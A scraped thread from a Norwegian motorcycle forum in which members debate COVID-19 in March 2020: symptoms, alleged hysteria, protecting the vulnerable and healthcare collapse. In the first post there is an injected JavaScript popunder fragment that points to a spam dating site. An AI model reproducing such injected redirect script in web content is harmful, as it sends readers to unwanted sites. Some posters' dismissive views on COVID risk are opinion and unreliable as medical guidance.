Koronaviruset - covid-19 - bekymret for 2024 sesongen?

... prat om alt og ingenting, trenger ikke handle om MC.
Svar
Brukeravatar
oivindg
Innlegg: 885
Registrert: 20 nov 2019, 21:45
Motorsykkelen din: BMW R1200R (2011)
Sted: Kongsberg

Re: Koronaviruset - covid-19 - bekymret for 2020 sesongen?

Legg inn av oivindg »

Mange forskjellige måter å takle dårlige nyheter på. Disse karene kan kanskje gi litt inspirasjon?
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Øivind

Min 2011 BMW R1200R - 2021 blir første hele sesong med lappen. Gleder meg!

Brukeravatar
niko
Innlegg: 1149
Registrert: 03 sep 2017, 00:00
Motorsykkelen din: Yamaha TDM 900 2006
Sted: Oslo

Re: Koronaviruset - covid-19 - bekymret for 2020 sesongen?

Legg inn av niko »

niko skrev: 19 mar 2020, 18:52
FredrikE24 skrev: 19 mar 2020, 17:27 Etter et par dagers helvete virker det som jeg er på tur oppover igjen. Noe som er godt.
Jeg har nok vært mildt påvirket. Tror jeg. Men det har vært en litt annerledes influensa-opplevelse.

Nå skal det sies at jeg ikke vet om jeg har vært positiv eller ikke, men mest trolig. Jeg har normalt en tredagers hver vår og ferdig med det.
Dette har vært en mikstur av en masse rart. Tørrhoste, slim, litt snørr, litt feber, litt diare, litt utmattelse, kroppsverking i varierende grad hele veien.
Nå gjenstår det egentlig å få tilbake normal pust. Ikke at jeg har problemer med å puste, men jeg legger godt merke til at jeg puster på en måte.

Så hvor lenge har jeg hatt dritten? Trolig en uke lenger enn jeg har trodd. Jeg var litt små-shakey Onsdag forrige uke. Ikke som jeg koblet til å være syk eller noe sånt. Det var varierende. Men ante mistanke på Torsdagen og tok hjemmekontor på Fredag.
Satt for sikkerhetsskyld hele helga alene i en slags frivillig karantene. Dro på jobb på Mandag, altfor fin til å tenke at noe var på fære egentlig. Hadde på en måte sittet hele helga og ventet på smellet. Hadde et møte hvor alle involverte satt på forskjellige møterom og plasser. Jobbet litt utover. Snakket med en kollega på mange meters avstand, tok ikke på noe som helst. 1430 var jeg helt kjørt og dro hjem. Så gikk det brått veldig fort nedover.


Det er interessant hvor små disse symptomene er i starten og hvor mye de svinger. Fra å være helt fin, til å bli litt svinmmel, til å bli helt overkjørt av Dovre-banen.. Ikke rart smitten er så stor..

Hvor og hvordan jeg har blitt smittet vet jeg ikke. Var i Hemsedal helgen i forveien, full rulle :roll
Ellers tok vi det veldig seriøst på jobb og var vel først av alle leietakere i kontorbygget til å iverksette tiltak rundt håndvask og desinfisering.
Igjen, aner ikke om jeg faktisk har vært positiv. Når det ikke er rom for å ta test, så blir man uviten.
Fordelen din er at du kan slippes ut i samfunnet igjen om noen dager.

Brukeravatar
niko
Innlegg: 1149
Registrert: 03 sep 2017, 00:00
Motorsykkelen din: Yamaha TDM 900 2006
Sted: Oslo

Re: Koronaviruset - covid-19 - bekymret for 2020 sesongen?

Legg inn av niko »

FredrikE24 skrev: 19 mar 2020, 17:27 Etter et par dagers helvete virker det som jeg er på tur oppover igjen. Noe som er godt.
Jeg har nok vært mildt påvirket. Tror jeg. Men det har vært en litt annerledes influensa-opplevelse.

Nå skal det sies at jeg ikke vet om jeg har vært positiv eller ikke, men mest trolig. Jeg har normalt en tredagers hver vår og ferdig med det.
Dette har vært en mikstur av en masse rart. Tørrhoste, slim, litt snørr, litt feber, litt diare, litt utmattelse, kroppsverking i varierende grad hele veien.
Nå gjenstår det egentlig å få tilbake normal pust. Ikke at jeg har problemer med å puste, men jeg legger godt merke til at jeg puster på en måte.

Så hvor lenge har jeg hatt dritten? Trolig en uke lenger enn jeg har trodd. Jeg var litt små-shakey Onsdag forrige uke. Ikke som jeg koblet til å være syk eller noe sånt. Det var varierende. Men ante mistanke på Torsdagen og tok hjemmekontor på Fredag.
Satt for sikkerhetsskyld hele helga alene i en slags frivillig karantene. Dro på jobb på Mandag, altfor fin til å tenke at noe var på fære egentlig. Hadde på en måte sittet hele helga og ventet på smellet. Hadde et møte hvor alle involverte satt på forskjellige møterom og plasser. Jobbet litt utover. Snakket med en kollega på mange meters avstand, tok ikke på noe som helst. 1430 var jeg helt kjørt og dro hjem. Så gikk det brått veldig fort nedover.


Det er interessant hvor små disse symptomene er i starten og hvor mye de svinger. Fra å være helt fin, til å bli litt svinmmel, til å bli helt overkjørt av Dovre-banen.. Ikke rart smitten er så stor..

Hvor og hvordan jeg har blitt smittet vet jeg ikke. Var i Hemsedal helgen i forveien, full rulle :roll
Ellers tok vi det veldig seriøst på jobb og var vel først av alle leietakere i kontorbygget til å iverksette tiltak rundt håndvask og desinfisering.
Igjen, aner ikke om jeg faktisk har vært positiv. Når det ikke er rom for å ta test, så blir man uviten.
Dumt du ikke er testa, om du hadde visst at du var positiv hadde du vært ferdig med hele greia.

Brukeravatar
Bjerknez
Innlegg: 22912
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Koronaviruset - covid-19 - bekymret for 2020 sesongen?

Legg inn av Bjerknez »

Kan ikke huske sist jeg tok i bruk en såkalt tredagers. Jeg er så og si nesten aldri syk. Vertfall ikke såpass syk at jeg blir hjemme fra jobb. Litt snufsing etc. blir det jo, men ikke noe stort mer enn det.

Vanlig influensa tar liv hvert eneste år. Også unge oppegående ungdommer (i følge VG). Men dette er en sykdom vi alle prøver og jobbe av oss og går gjerne ut blandt folk uten å tenke noe mer over det. Går man til fastlegen får man en sykemelding (for den som ber om det) ellers så får man vel en boks paracet.

Madammen var syk her om dagen og konstanterte sporenstreks med at dette kunne være Korona og at jeg burde sove på sofaen og at vi burde holde avstand. Niks... jeg sov i sengen og endret ikke mine vaner grunnet dette. Til min store overraskelse ble jeg aldri syk og etter 2-3 dager var hun frisk nok til å dra på jobb. Hverken jeg eller noen rundt meg har så vidt jeg vet blitt smittet. Men så har jeg heller ikke oppsøkt folkesamlinger.

I dag tror jeg mange konstaterer at dem har hatt eller har Corona så fort dem blir syke. Man slår det opp med store bokstaver og låser seg inne. Selvsagt må man også fortelle alle på Facebook at man trolig har Corona og plutselig har man skapt en frykt, og det bare EN person alene.

Ja, jeg tror Corona er smittsomt, og ja, jeg tror noen kan død av denne sykdommen, men mest trolig i følge media eldre og de som har underliggende sykdommer.

Jeg er ikke gammel i den grad og har ingen underliggende sykdommer som jeg vet om og er vel ellers ganske frisk og rask bortsett fra en dårlig rygg.

Så ja, Coronaen er her og mange blir smittet av denne, men så sant man kanskje holder seg unna de eldre og "svake" i samfunnet samt tar noen jordnære forholdsregler for å beskytte de som med størst sannsynlighet kan dø av dette, så går vertfall livet som normalt her i gården.

Jeg synes det er veldig mye hysteri ute å går. Facebook og sosiale medier tyter over av Corona innhold og det er allerede kommet reklame på radio og TV som bruker folks redsel mot å tjene noen kroner.

Jeg har bare en veldig nøktern holdning til dette og noen ganger tror jeg det kan være best. Livet går videre, så langt det er mulig når hele samfunnet nå er på god vei til å stenges ned.

Så ja.. jeg man skal ta forholdsregler, men det finnes måte på. Stenger man ett par butikker i et stort kjøpesenter så mister også ndre butikker grunnet dette omsetning og vi ser allerede kjøpesentere som stenges helt. Er man gammel og syk og allikevel trosser dette viruset og drar på shopping blandt mange mennesker, så mener jeg man bør takke seg selv. De fleste har blitt advart nå.

Er man ung og oppsøker gamlehjem i dermed utsetter eldre og syke for dette viruset, så burde man blitt stoppet ja. Gamlehjem og sykehus etc. burde definitivt stenges ned for besøkende og for dem som ikke trengte øyeblikkelig hjelp. Men ellers.... njææh....

Brukeravatar
pingvin
Innlegg: 1603
Registrert: 20 okt 2013, 19:25
Motorsykkelen din: Triumph Scrambler 1200 XE

Re: Koronaviruset - covid-19 - bekymret for 2020 sesongen?

Legg inn av pingvin »

Begynte å skrive noe...men ombestemte meg ;)

På plussiden, ferdig med karantene i dag og drar opp på hytta på Blefjell i ettermiddag, kjekt med hytte i hjemkommunen i disse dager :thumleft Litt synd med alle hytteeierne som ignorerte anmodningene fra kommunen forrige helg, førte til at løypeforeningen sluttet å kjøre løyper, noe som går utover oss som har lov å være der samt de mange som kommer på dagstur i helgene. Men slik er det når for mange lager sine egne regler. Men drar innom Intersport og henter fjellski på vei opp, da ikke avhengig av preppa løyper og hadde uansett kjøpt dette på et tidspunkt. Tok alt på tlf i går så alt står klart, bare dobbeltsjekke at støvlene er riktig størrelse, vifte med kort og dra igjen.
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days

Brukeravatar
simpson
Innlegg: 2742
Registrert: 09 mar 2011, 14:40
Motorsykkelen din: 2018 Ducati Multistrada 950

Re: Koronaviruset - covid-19 - bekymret for 2020 sesongen?

Legg inn av simpson »

Bjerknez skrev: 20 mar 2020, 05:10 Kan ikke huske sist jeg tok i bruk en såkalt tredagers. Jeg er så og si nesten aldri syk. Vertfall ikke såpass syk at jeg blir hjemme fra jobb. Litt snufsing etc. blir det jo, men ikke noe stort mer enn det.

Vanlig influensa tar liv hvert eneste år. Også unge oppegående ungdommer (i følge VG). Men dette er en sykdom vi alle prøver og jobbe av oss og går gjerne ut blandt folk uten å tenke noe mer over det. Går man til fastlegen får man en sykemelding (for den som ber om det) ellers så får man vel en boks paracet.

Madammen var syk her om dagen og konstanterte sporenstreks med at dette kunne være Korona og at jeg burde sove på sofaen og at vi burde holde avstand. Niks... jeg sov i sengen og endret ikke mine vaner grunnet dette. Til min store overraskelse ble jeg aldri syk og etter 2-3 dager var hun frisk nok til å dra på jobb. Hverken jeg eller noen rundt meg har så vidt jeg vet blitt smittet. Men så har jeg heller ikke oppsøkt folkesamlinger.

I dag tror jeg mange konstaterer at dem har hatt eller har Corona så fort dem blir syke. Man slår det opp med store bokstaver og låser seg inne. Selvsagt må man også fortelle alle på Facebook at man trolig har Corona og plutselig har man skapt en frykt, og det bare EN person alene.

Ja, jeg tror Corona er smittsomt, og ja, jeg tror noen kan død av denne sykdommen, men mest trolig i følge media eldre og de som har underliggende sykdommer.

Jeg er ikke gammel i den grad og har ingen underliggende sykdommer som jeg vet om og er vel ellers ganske frisk og rask bortsett fra en dårlig rygg.

Så ja, Coronaen er her og mange blir smittet av denne, men så sant man kanskje holder seg unna de eldre og "svake" i samfunnet samt tar noen jordnære forholdsregler for å beskytte de som med størst sannsynlighet kan dø av dette, så går vertfall livet som normalt her i gården.

Jeg synes det er veldig mye hysteri ute å går. Facebook og sosiale medier tyter over av Corona innhold og det er allerede kommet reklame på radio og TV som bruker folks redsel mot å tjene noen kroner.

Jeg har bare en veldig nøktern holdning til dette og noen ganger tror jeg det kan være best. Livet går videre, så langt det er mulig når hele samfunnet nå er på god vei til å stenges ned.

Så ja.. jeg man skal ta forholdsregler, men det finnes måte på. Stenger man ett par butikker i et stort kjøpesenter så mister også ndre butikker grunnet dette omsetning og vi ser allerede kjøpesentere som stenges helt. Er man gammel og syk og allikevel trosser dette viruset og drar på shopping blandt mange mennesker, så mener jeg man bør takke seg selv. De fleste har blitt advart nå.

Er man ung og oppsøker gamlehjem i dermed utsetter eldre og syke for dette viruset, så burde man blitt stoppet ja. Gamlehjem og sykehus etc. burde definitivt stenges ned for besøkende og for dem som ikke trengte øyeblikkelig hjelp. Men ellers.... njææh....
Helt enig.
Dette har tatt helt av og koster meg og deg deg alvorlige summer.
Det har blitt ett hysteri uten sidestykke.
Er ikke selv permittert og reiser rundt på jobb som vanlig. Jeg merker ikke noe økonomisk og jobben planlegger ikke å permittere noen, så vi er heldig sånn sett.
Ser at NRKk også ser på galskapen og hadde ett program som heter, hva koster ett liv. Ja det må en virkelig begynne å se på når snittalderen på døde i norge er 89😳 år.

Brukeravatar
Bjerknez
Innlegg: 22912
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Koronaviruset - covid-19 - bekymret for 2020 sesongen?

Legg inn av Bjerknez »

Jeg ser forøvrig også at alt hysteriet som formodligen skal redde corona smittede, går ut over andre i følge aviser som skulle hatt hjelp og som kan dø av å vente. Da synes jeg vinningen går litt opp i spinningen og blir bare enda værre.

Er en VG pluss sak om dette, men får ikke lest hele stykket uten å punge ut. Noe jeg ikke akter å gjøre av prinsipp.

tormodg
Innlegg: 293
Registrert: 18 jul 2017, 11:06
Motorsykkelen din: Triumph Speed 400 (2024)
Sted: Oslo

Re: Koronaviruset - covid-19 - bekymret for 2020 sesongen?

Legg inn av tormodg »

Det er lov å kalle det hysteri, men greia nå handler mest om å unngå at alle blir smittet på en gang. Selv om du @bjerknez ikke har blitt syk, så er det mange som blir det, og noen av det blir veldig dårlig. Selv er jeg astmatiker og holder meg langt unna alle mulige smittekilder så godt jeg kan.

Brukeravatar
Skogstrollet
Innlegg: 742
Registrert: 03 okt 2016, 13:29
Motorsykkelen din: Honda CRF250L, Yamaha XSR700
Sted: Oslo

Re: Koronaviruset - covid-19 - bekymret for 2020 sesongen?

Legg inn av Skogstrollet »

Disse to artiklerne/bloggpostene kan nok være greit å få med seg - uansett hvis man er i full panikk-modus eller synes at alt er overdrevet - siden de er faktabaserte og skrevet av fagfolk, ikke "overskirftsjournalister". Spesielt den første linken er full av fakta, ikke bare en masse synsing ;)

https://sciencebasedmedicine.org/covid- ... d-to-know/

https://sciencebasedmedicine.org/more-covid-19-news/
"Finns ingen plats att gömma sig
Vart du än går skogen hittar dig"

Brukeravatar
Bjerknez
Innlegg: 22912
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Koronaviruset - covid-19 - bekymret for 2020 sesongen?

Legg inn av Bjerknez »

tormodg skrev: 20 mar 2020, 08:14 Det er lov å kalle det hysteri, men greia nå handler mest om å unngå at alle blir smittet på en gang. Selv om du @bjerknez ikke har blitt syk, så er det mange som blir det, og noen av det blir veldig dårlig. Selv er jeg astmatiker og holder meg langt unna alle mulige smittekilder så godt jeg kan.
De fleste som blir smittet får relativt milde symptomer i følge media. Det er mange som blir smittet ja. Om ikka av Corona så av en haug andre ting.

Ja, jeg forstår hva dem prøver på, men jeg mener dem prøver for hardt. Man kan ikke redde alle og slike viruskriser kan vi vel ikke verne oss mot. jeg ville satt det på livsregningen. Vi løper risikoer hver eneste dag.

Jeg holder meg også unna smittekilder hvis det er mulig og jeg prøver og ikke gi alle jeg treffer en bjørneklem. At du som er astmatiker er ekstra forsiktig skjønner jeg godt. Det er ikke det jeg snakker om.

Jeg sier bare at følgende etter de tiltakene som blir gjort blir enorme rent økonomisk og mange liv blir berørt på den andre siden av viruset. Man må se helheten og ikke titte på dette viruset med kikkert.

De aller aller største bedriftene som SAS og Norwegian er jeg sikker på blir reddet. Bare vent å se. Staten kommer til å punge ut for at disse skal få leve videre hvis det blir nødvendig. Men frisøren i Bodø kan nok bare ta seg en bolle. Å slik går no dagan.

Brukeravatar
Subsea79
Innlegg: 230
Registrert: 13 nov 2018, 09:28
Motorsykkelen din: 2020 BMW F900R

Re: Koronaviruset - covid-19 - bekymret for 2020 sesongen?

Legg inn av Subsea79 »

Bjerknez skrev: 20 mar 2020, 08:32
tormodg skrev: 20 mar 2020, 08:14 Det er lov å kalle det hysteri, men greia nå handler mest om å unngå at alle blir smittet på en gang. Selv om du @bjerknez ikke har blitt syk, så er det mange som blir det, og noen av det blir veldig dårlig. Selv er jeg astmatiker og holder meg langt unna alle mulige smittekilder så godt jeg kan.
De fleste som blir smittet får relativt milde symptomer i følge media. Det er mange som blir smittet ja. Om ikka av Corona så av en haug andre ting.

Ja, jeg forstår hva dem prøver på, men jeg mener dem prøver for hardt. Man kan ikke redde alle og slike viruskriser kan vi vel ikke verne oss mot. jeg ville satt det på livsregningen. Vi løper risikoer hver eneste dag.

Jeg holder meg også unna smittekilder hvis det er mulig og jeg prøver og ikke gi alle jeg treffer en bjørneklem. At du som er astmatiker er ekstra forsiktig skjønner jeg godt. Det er ikke det jeg snakker om.

Jeg sier bare at følgende etter de tiltakene som blir gjort blir enorme rent økonomisk og mange liv blir berørt på den andre siden av viruset. Man må se helheten og ikke titte på dette viruset med kikkert.

De aller aller største bedriftene som SAS og Norwegian er jeg sikker på blir reddet. Bare vent å se. Staten kommer til å punge ut for at disse skal få leve videre hvis det blir nødvendig. Men frisøren i Bodø kan nok bare ta seg en bolle. Å slik går no dagan.
Hadde egentlig sett meg ferdig med denne tråden, men vil presisere en ting til de som ikke fikk med seg debatten i går.
Man må ikke blande innenriks og utenriks økonomi i denne saken, slik att all økonomisk nedgang nå legges til de tiltakene gjort av regjeringen i Norge. Det tror jeg er et viktig prinsipp

tormodg
Innlegg: 293
Registrert: 18 jul 2017, 11:06
Motorsykkelen din: Triumph Speed 400 (2024)
Sted: Oslo

Re: Koronaviruset - covid-19 - bekymret for 2020 sesongen?

Legg inn av tormodg »

Bjerknez skrev: 20 mar 2020, 08:32 Ja, jeg forstår hva dem prøver på, men jeg mener dem prøver for hardt. Man kan ikke redde alle og slike viruskriser kan vi vel ikke verne oss mot. jeg ville satt det på livsregningen. Vi løper risikoer hver eneste dag.
Greit nok det, men som sagt: greia er at man forsøker strengt tatt ikke å redde alle. Man forsøker å hindre at alle blir sjuke samtidig. Da knekker systemet sammen. Nå dør det flere hundre mennesker hver dag bare i Italia og Spania, helsevesenet der kollapser.

Brukeravatar
gsx750_80
Innlegg: 2212
Registrert: 24 apr 2010, 19:34
Motorsykkelen din: GSX 750 '80, Ninja 250R m.fl.
Sted: Trøndelag
Kontakt:

Re: Koronaviruset - covid-19 - bekymret for 2020 sesongen?

Legg inn av gsx750_80 »

Tidligere (?) medlem av poporkesteret Motorpsycho rapporterer fra Italia https://www.adressa.no/kultur/2020/03/2 ... 373542.ece
mvh

-gsx750_80

Brukeravatar
Sakkle
Innlegg: 1080
Registrert: 28 aug 2017, 23:57
Motorsykkelen din: KTM 790 Adventure

Re: Koronaviruset - covid-19 - bekymret for 2020 sesongen?

Legg inn av Sakkle »

simpson skrev: 20 mar 2020, 07:50 Ser at NRKk også ser på galskapen og hadde ett program som heter, hva koster ett liv. Ja det må en virkelig begynne å se på når snittalderen på døde i norge er 89😳 år.
Misforstår jeg deg eller mener du alvorlig talt at en 89 åring eller en med underliggende sykdom er verdt mindre enn en frisk 20 åring?

Er det ikke det samme hvem som dør av dette? Det å begrense antall dødsfall må da være MYE viktigere en eventuelle økonomiske konsekvenser?
tormodg skrev: 20 mar 2020, 14:03 Greit nok det, men som sagt: greia er at man forsøker strengt tatt ikke å redde alle. Man forsøker å hindre at alle blir sjuke samtidig. Da knekker systemet sammen. Nå dør det flere hundre mennesker hver dag bare i Italia og Spania, helsevesenet der kollapser.
Dette er også et viktig poeng mange går glipp av. Selv om det kanskje er primært gamle og syke som dør av dette, i den grad det er relevant, så vil vi vel unngå at helsevesenet blir fullstendig overbelastet. Jeg vil alle fall ikke havne i en situasjon der det er umulig å få hjelp om man knekker beinet fordi systemet har kollapset fullstendig.
2019 KTM 790 Adventure
2008 KTM Duke 690

BlåBil
Innlegg: 121
Registrert: 28 jun 2019, 00:07
Motorsykkelen din: Dyna

Re: Koronaviruset - covid-19 - bekymret for 2020 sesongen?

Legg inn av BlåBil »

Sakkle skrev: 20 mar 2020, 18:59
simpson skrev: 20 mar 2020, 07:50 Ser at NRKk også ser på galskapen og hadde ett program som heter, hva koster ett liv. Ja det må en virkelig begynne å se på når snittalderen på døde i norge er 89😳 år.
Misforstår jeg deg eller mener du alvorlig talt at en 89 åring eller en med underliggende sykdom er verdt mindre enn en frisk 20 åring?

Er det ikke det samme hvem som dør av dette? Det å begrense antall dødsfall må da være MYE viktigere en eventuelle økonomiske konsekvenser?
Tragisk men om man må velge mellom en yngre eller en eldre person å redde uten følelser involvert, så skjønner jeg hvorfor Italia må ha måttet gjøre det de har gjort.

Svar